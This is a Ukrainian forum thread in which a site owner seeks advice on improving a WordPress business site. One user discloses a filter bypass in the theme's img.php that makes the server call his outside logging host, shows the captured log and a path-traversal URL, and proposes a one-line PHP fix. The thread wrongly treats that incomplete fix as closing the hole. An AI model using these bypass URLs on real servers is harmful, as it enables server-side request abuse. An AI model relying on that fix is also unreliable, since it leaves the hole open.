1

Тема: Вдосконалити сайт

Є сайт http://mkukraine.com.ua (на разі лиш російська версія, далі добавиться українська)

Мене попросили покращити сайт без жодної конкретики, просто щоб було краще. Хто що може порадити в плані функціональності та зручності?

Був собі цебер, та переполуцебрився на полуцебренята
Неймовірний блог про мандри http://bosano.ga

2

Re: Вдосконалити сайт

може, потрібно перекласти сайт на українську мову

Подякували: karmeljuk1

3

Re: Вдосконалити сайт

1. Зображення на півекрана (зверху) - від нього сумнівна користь.
2. Яка основна мета цього сайту - торгувати металом чи розповідати про колку горіхів? Відповідно змінюємо головну, поки що вона викликає дисонанс.
3. Заходимо на сторінку з описом якоїсь корисної штуки, а замовити просто так не вийде. Там треба велику і помітну кнопку "ХОЧУ ЦЮ ШТУКОВИНУ". Опціонально можна подумати про кошик.
4. Зате на цьому сайті є розділ "Заказ товара", в якому все це треба ввести руками. Дивне рішення.
5. Колонку "Изделия из металла" зробити помітншою, можна з випадаючими меню, розділ "Статті" викинути звідти.
6. Немає цін.
7. Категорія "Витая труба", сторінки "Как заработать на колке ореха" і "Витая труба".

МАКЕ ЦКЯАІИЕ БЯЕАТ АБАІИ
Подякували: karmeljuk, Ярослав2

4

Re: Вдосконалити сайт

Joker - про українську мову написав зверху
quez - дякую, дуже слушні та конструктивні зауваження

Був собі цебер, та переполуцебрився на полуцебренята
Неймовірний блог про мандри http://bosano.ga

5

Re: Вдосконалити сайт

невеличка вразливість в img.php

http://mkukraine.com.ua/wp-content/themes/edmin-1.2.9/themify/img.php?src=http://mobilink.url.ph/img/logo.php?http://mkukraine.com.ua/?435635774568

Тут я обійшов фільтр та підключився до свого сервера (сніфер http://mobilink.url.ph/img/log.php?password=VTrim) через ваш :)
А взагалі таку штуку можна використати для DoS атак від  IP вашого сервера.

Запис N35
IP адрес: 78.137.1.149 (Переглянути інформацію)
Браузер (UserAgent): Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Рядок запиту: http://mkukraine.com.ua/?45777567
Реферер: Немає
Real IP: Немає
Мова:
Тип запиту: GET
Час запиту: 4 хвилини тому
Заголовок Accept: */*
Тип кодування: Немає
Тип підключення: close
Імя віддаленого хоста: Немає
Порт користувача: 59215

Гео IP інформація
Код країни: UA
Регіон: Черкасская область
Населений пункт: Черкасы
Географічні координати: Широта - 49.42854º Довгота - 32.06207º
Поштовий індекс: 18030
Часовий пояс: +03:00
Провайдер IP інформація
ОФ. назва провайдера в бд RIPE: McLaut-Invest LLC
Назва російською: ООО "Маклаут-Инвест"
Сайт провайдера: http://mclaut.com/
Номер автономної системи провайдера: 25133
Числове значення (iptolong) першої IP адреси мережі провайдера: 1317601280
Числове значення (iptolong) останньої IP адреси мережі провайдера: 1317609471
Мережа провайдера: 78.137.0.0
Маска мережі провайдера: 19

Ну тут просто помилки

http://mkukraine.com.ua/wp-content/themes/edmin-1.2.9/themify/img.php?src=../../../../../
=)

6

Re: Вдосконалити сайт

невеличка вразливість в img.php

цей скрипт обрізає картинки. Тут нічого вдіяти не зможу, бо доведеться дуже багато чого змінювати

Був собі цебер, та переполуцебрився на полуцебренята
Неймовірний блог про мандри http://bosano.ga

7

Re: Вдосконалити сайт

karmeljuk написав:

невеличка вразливість в img.php

цей скрипт обрізає картинки. Тут нічого вдіяти не зможу, бо доведеться дуже багато чого змінювати

Заборонить обхід:

if(substr_count($_GET['src'],'http://') > 1) 
{ 
exit('ERROR'); 
}
=)

8

Re: Вдосконалити сайт

Заборонить обхід:

Заборонив в скрипті img.php . Порадьте, як перевірити тепер роботу ?

Був собі цебер, та переполуцебрився на полуцебренята
Неймовірний блог про мандри http://bosano.ga

9 Востаннє редагувалося VTrim (01.11.2014 11:06:00)

Re: Вдосконалити сайт

karmeljuk написав:

Заборонить обхід:

Заборонив в скрипті img.php . Порадьте, як перевірити тепер роботу ?

Скиньте код,куди ви і як вставили (http://mkukraine.com.ua/wp-content/them … fy/img.php) саме цей?

Коли підлкючитись до скрипту так

/img.php?src=http://test.ru/test.php?http://vashdomen.com/test.php

Вилетить помилка,перевірено. У вас помилка не вилетіла,значить кудись не туди вставили.

=)

10

Re: Вдосконалити сайт

Поставив в кінець:

    
...
protected function debug($level, $msg){
        if(DEBUG_ON && $level <= DEBUG_LEVEL){
            $execTime = sprintf('%.6f', microtime(true) - $this->startTime);
            $tick = sprintf('%.6f', 0);
            if($this->lastBenchTime > 0){
                $tick = sprintf('%.6f', microtime(true) - $this->lastBenchTime);
            }
            $this->lastBenchTime = microtime(true);
            error_log("WordThumb Debug line " . __LINE__ . " [$execTime : $tick]: $msg");
        }
    }
}

if(substr_count($_GET['src'],'http://') > 1)
{
  exit('ERROR');
}
Був собі цебер, та переполуцебрився на полуцебренята
Неймовірний блог про мандри http://bosano.ga

11

Re: Вдосконалити сайт

Ні,потрібно в самий верх файлу.

=)

12

Re: Вдосконалити сайт

тепер зверху

Був собі цебер, та переполуцебрився на полуцебренята
Неймовірний блог про мандри http://bosano.ga

13

Re: Вдосконалити сайт

karmeljuk написав:

тепер зверху

Результат:
http://mkukraine.com.ua/wp-content/them … ne.com.ua/

=)

14

Re: Вдосконалити сайт

Як для вордпреса, то це достатньо хороша тема. Якщо потрібно вдосконалення, то треба переходити на якийсь фреймворк...

15

Re: Вдосконалити сайт

ktretyak написав:

Як для вордпреса, то це достатньо хороша тема. Якщо потрібно вдосконалення, то треба переходити на якийсь фреймворк...

По вашому,сайт можна вдосконалити тільки з фреймворком?

=)

16

Re: Вдосконалити сайт

VTrim написав:
karmeljuk написав:

тепер зверху

Результат:
http://mkukraine.com.ua/wp-content/them … ne.com.ua/

Не зовсім розумію: це добре чи погано?  І взагалі, як самому протестувати і що саме тестувати?

Був собі цебер, та переполуцебрився на полуцебренята
Неймовірний блог про мандри http://bosano.ga

17 Востаннє редагувалося VTrim (06.11.2014 10:47:01)

Re: Вдосконалити сайт

karmeljuk написав:
VTrim написав:
karmeljuk написав:

тепер зверху

Результат:
http://mkukraine.com.ua/wp-content/them … ne.com.ua/

Не зовсім розумію: це добре чи погано?  І взагалі, як самому протестувати і що саме тестувати?

Перечитайте 5й пост. Ця вразливість тепер закрита. Там стояв слабкий фільтр,який забороняв підключатись до лівого http серверу. Можна було піключати тільки http://вашсервер.com/,тобто тільки ваш хост,але якщо вводиш http://мійсервер.com/?http://вашсервер.com/ ,то фільтр на це не реагував,і відбувалось підключення вашого сервера до мого. Я заборонив вводити більше одного http://,тим самим закрив вразливість,при спробі ввести два,вилітає ERROR

=)

18

Re: Вдосконалити сайт

оо, дякую. Де взагалі прочитати про захист WordPress ? В мене попросили ще один сайт перевірили на взломи

Був собі цебер, та переполуцебрився на полуцебренята
Неймовірний блог про мандри http://bosano.ga

19

Re: Вдосконалити сайт

karmeljuk написав:

оо, дякую. Де взагалі прочитати про захист WordPress ? В мене попросили ще один сайт перевірили на взломи

Взагалі є різні багтрекери,хакерські сайти,де викладають вразливості,експлоіти.
Але цю помилку я знайшов сам.

=)